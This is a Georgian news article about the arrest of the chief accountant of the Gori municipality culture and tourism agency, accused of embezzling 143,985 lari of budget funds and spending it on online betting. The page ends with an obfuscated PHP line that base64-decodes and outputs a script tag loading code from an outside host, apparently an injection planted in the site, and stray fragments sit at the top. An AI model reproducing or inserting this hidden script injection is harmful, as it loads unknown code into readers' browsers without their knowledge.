celsiusi
ავერსი შნაიდერი
გორის მუნიციპალიტეტის მერიის კულტურისა და ტურიზმის განვითარების ხელშეწყობის სააგენტოს მთავარი ბუღალტერი სახელმწიფო თანხების მითვისების ბრალდებით დააკავეს.
 
ამის შესახებ ინფორმაციას სახელმწიფო უსაფრთხოების სამსახურის ანტიკორუფციული სააგენტო ავრცელებს. 
 
უწყების ინფორმაციით, ჯამში, მან ბიუჯეტიდან 143 985 ლარი მიითვისა.
 
„თუმცა, ინტენსიურად გრძელდება საბუღალტრო და საბანკო დოკუმენტაციის შესწავლა, რომლის დასრულების შემდეგაც მოსალოდნელია, მითვისებული თანხის ოდენობა მკვეთრად გაიზარდოს.
 
ჩატარებული გამოძიებით დგინდება, რომ აღნიშნული პირი, მითითებულ თანამდებობაზე მუშაობის პერიოდში, სააგენტოს კუთვნილ საბიუჯეტო სახსრებს სისტემატურად, სხვადასხვა დანიშნულებით რიცხავდა სს „თიბისი ბანკში“ და სს „ლიბერთი ბანკში“ გახსნილ თავის პირად საბანკო ანგარიშზე, ხოლო შემდგომ იყენებდა ინტერნეტტოტალიზატორებში,“ — წერია უწყების განცხადებაში.
 
პიროვნება დაკავებულია სამსახურებრივი მდგომარეობის გამოყენების ფაქტზე, დიდი ოდენობით თანხების მითვისების ბრალდებით.
 
ცნობისთვის მანამდე, მომხდართან დაკავშირებით ოფიციალური ინფორმაცია გაავრცელა სახელმწიფო აუდიტმაც. იმ დროისთვის, უწყებისთვის ცნობილი იყო მხოლოდ ის, რომ ბრალდებული სახელმწიფო ბიუჯეტიდან თანხებს კერძო ანგარიშებზე რიცხავდა, მაგრამ, აღნიშნული განცხადებაში ტოტალიზატორებზე საუბარი არ იყო.
 
 
 
736
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");